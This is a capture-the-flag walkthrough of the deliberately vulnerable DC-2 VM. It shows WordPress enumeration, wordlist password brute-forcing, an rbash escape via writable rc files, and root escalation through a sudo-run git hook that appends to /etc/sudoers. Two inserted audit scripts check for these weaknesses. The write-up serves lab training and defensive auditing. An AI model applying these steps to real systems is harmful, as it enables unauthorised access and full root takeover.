
DC919 CTF night w/"DC-2"

DC919 CTF exercise night using "DC-2" prebuilt VM image

SPOILER ALERT: This document is intended to be a walk-through, so if you want to do this CTF challenge honestly, close this page now.

Credits

The following is the result of a group effort during a CTF conf call. There were a bunch of people present on the call, and if they ask me to I'll happily list them here. We share lots of tricks during these calls, everyone contributes and we all come out of it smarter.

Setup

According to the author's description, you must add a hosts(5) entry or the CMS running on the VM will not work correctly:

192.168.57.3 dc-2

In this case the VMs have the following IPs:

Process

nmap -A -sS -p1-65535 dc-2

This eventually returns Apache + WordPress on port 80 and sshd on port 7744.

Visiting the site in a browser shows a 'Flag' link with the following text:

Flag 1:

Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can't win them all.

Log in as one to see the next flag.

If you can't find it, log in as another.

Need to do the following because wpscan breaks on single-word domains (see dc6 writeup):

apt update
apt install libz-dev
gem update cms_scanner
gem update wpscan
wpscan -o wpscan2.txt -e ap --plugins-detection aggressive --url http://dc-2/

This reveals WordPress version 4.7.10 (insecure, released 2018-04-03)

Plugin akismet (out of date: 3.3.2)

Kali contains a program called "cewl" (the hint from flag 1 clearly references this), which is a wordlist generator.

Run like this:

cewl http://dc-2/ >wordlist.txt

Trying to use this wordlist to brute-force some passwords, wpscan first enumerates a few users (admin, jerry, tom) and then tries the wordlist against each of them:

wpscan -P wordlist.txt --url http://dc-2/

Got a few passwords:

[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

Using these (I used 'jerry' for this) and navigating around the /wp-admin/ links, I found a page named "Flag 2":

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

Trying the usernames/passwords with SSH (port 7744, remember?), 'tom' works but gives a weird, stunted shell, which I quickly recognized as 'rbash'. Everything obvious but 'ls' showed a command not found error. "echo $PATH" gives a single directory, and modifying $PATH fails because of rbash.

The "ls" command works and shows a "flag3.txt".

"ls -alR" shows the .bashrc/.bash_profile shell rc files, flag3.txt, and the directory in $PATH, which contains four valid commands: less, ls, scp, vi.

cat, more and all sorts of other commands DO NOT work, but tab completion does, so enumerating commands one starting letter at a time (a<TAB>, b<TAB>, c<TAB>, etc.) gets you to 'l', which reveals that "less" is allowed:

less flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

There is more than one method that works here to break out of rbash, so I might as well show hints at a few of them.

The crux of the problem with rbash is that you may only execute binaries located in $PATH, and the $PATH variable is immutable. However, if you look closely at "ls -alF ~" you can see that .bashrc and .bash_profile are both writable by the "tom" user. This is the easiest thing to exploit here. You can use "less", "vi", or even "scp" them off the target to read them. They are very short shell rc files with only one line each, which sets PATH.

To change your $PATH, you can either "vi" these files directly, or you can scp them off, edit them, then scp them back. Both methods work fine. While researching this one, I found that in a more restrictive rbash environment, even "scp -S" can be used to run a custom script and break out, although it is more cumbersome to do.

'vi' also appears to be allowed, but inside rbash you can't shell out from it ...
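The weakness described above is a configuration issue, not a bug in rbash: the confinement only holds if the user cannot touch the rc files, the home directory they live in, or the PATH directory. The following audit script is an added example and not part of the original write-up; it assumes GNU or BusyBox stat(1) with -c, and the paths it is run against are constructed fixtures.

```shell
#!/bin/sh
# Added audit script, not part of the original write-up: it checks the
# conditions that let tom escape rbash above, namely rc files, the home
# directory and the sole PATH directory being owned or group/world-writable
# by the confined user. Assumes GNU/BusyBox stat(1) with -c.

# confined OWNER MODE USER -> 0 if USER cannot modify the object
# (not the owner, and no group/world write bit set), 1 otherwise.
confined() {
    [ "$1" != "$3" ] || return 1
    # MODE is octal as printed by stat -c %a; prefix 0 so sh parses it as octal
    [ $(( 0$2 & 022 )) -eq 0 ] || return 1
    return 0
}

# audit_rbash_home HOME USER BINDIR -> prints one line per finding and
# returns the number of findings (0 means the confinement holds).
audit_rbash_home() {
    home="$1"; user="$2"; bindir="$3"; n=0
    for f in "$home/.bashrc" "$home/.bash_profile" "$home/.profile" \
             "$bindir" "$bindir"/*; do
        [ -e "$f" ] || continue
        # resolve symlinks so the real binary in BINDIR is checked, not the link
        f=$(readlink -f "$f") || continue
        owner=$(stat -c %U "$f"); mode=$(stat -c %a "$f")
        if ! confined "$owner" "$mode" "$user"; then
            echo "FINDING: $user can modify $f (owner=$owner mode=$mode)"
            n=$((n + 1))
        fi
    done
    # a home directory the user can write lets them delete and recreate the
    # rc files even when those files themselves are root-owned
    if ! confined "$(stat -c %U "$home")" "$(stat -c %a "$home")" "$user"; then
        echo "FINDING: $user can replace files in $home"
        n=$((n + 1))
    fi
    return $n
}
```

Run it as root against each account whose login shell is rbash, e.g. `audit_rbash_home /home/tom tom /home/tom/usr/bin`; any output means the restricted shell is escapable by the user it is meant to confine.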

"ls -alF" shows .bashrc and .bash_profile as writable by 'tom', the user we're logged in as, so go ahead and "vi" them and change PATH to something like:

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/home/tom/usr/bin

Now, upon logging in again, you get a more usable shell with all commands available. Using flag3's hint of "su jerry", we get jerry's account, from which we might as well have a look around:

tom@DC-2:~$ su jerry
Password: adipiscing 
jerry@DC-2:/home/tom$ cd
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

More enumeration shows this (which follows the hint above):

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
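A rule like the one above is the thing to catch in an audit: a NOPASSWD root entry for a binary that runs user-controlled files (git runs repository hooks) is equivalent to ALL. The helper below is an added example, not part of the original write-up; it parses `sudo -l` output in the format shown on this page (the sample input is a constructed copy of that listing) and warns on such rules.

```shell
#!/bin/sh
# Added audit helper, not from the original write-up: reads `sudo -l`
# output and reports every command runnable as root without a password.
# SAMPLE_SUDO_L is constructed to match the listing on this page.

SAMPLE_SUDO_L='Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git'

# root_nopasswd_cmds: stdin = sudo -l output; prints one command per line
# for rules that run as root (or ALL) and carry the NOPASSWD tag.
root_nopasswd_cmds() {
    awk '
        /^User .* may run the following commands/ { rules = 1; next }
        rules && /^[[:space:]]*\((root|ALL)/ && /NOPASSWD:/ {
            sub(/^.*NOPASSWD:[[:space:]]*/, "")
            n = split($0, cmds, /,[[:space:]]*/)
            for (i = 1; i <= n; i++) print cmds[i]
        }'
}

# check_rules: stdin = sudo -l output. Warns on ALL and on git, whose normal
# operation executes repo hooks as shown above; returns 1 if any such rule
# exists, 0 otherwise. Other commands are printed for manual review.
check_rules() {
    found=0
    cmds=$(root_nopasswd_cmds)
    oldifs=$IFS; IFS='
'
    for c in $cmds; do
        case "$c" in
            ALL|*/git|*/git\ *) echo "WARNING: $c as root is effectively a root shell"; found=1 ;;
            *) echo "review: $c" ;;
        esac
    done
    IFS=$oldifs
    return $found
}
```

On a real host, pipe the live output in with `sudo -l -U jerry | check_rules` instead of the constructed sample.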

Privilege Escalation!

Using this "sudo git" permission, I used prior knowledge of git executing arbitrary shell commands via hooks to come up with a pre-commit hook that added me to sudoers(5), like this:

jerry@DC-2:~$ mkdir a_git_repo
jerry@DC-2:~$ cd a_git_repo/
jerry@DC-2:~/a_git_repo$ git init .
Initialized empty Git repository in /home/jerry/a_git_repo/.git/
jerry@DC-2:~/a_git_repo$ cat >.git/hooks/pre-commit <<EOF
> #!/bin/sh
> 
> echo "jerry ALL = NOPASSWD: ALL" >>/etc/sudoers
> EOF
jerry@DC-2:~/a_git_repo$ chmod +x .git/hooks/pre-commit
jerry@DC-2:~/a_git_repo$ echo "root" >root.txt
jerry@DC-2:~/a_git_repo$ git add root.txt 
jerry@DC-2:~/a_git_repo$ sudo git commit -m "root"
[master (root-commit) d9e3302] root
 Committer: root <root@DC-2>
...
 1 file changed, 1 insertion(+)
 create mode 100644 root.txt
jerry@DC-2:~/a_git_repo$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
jerry@DC-2:~/a_git_repo$ sudo id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:~# ls /root
final-flag.txt
root@DC-2:~# cat /root/final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

© 2019 systat | Powered by OpenBSD | Built with ssg3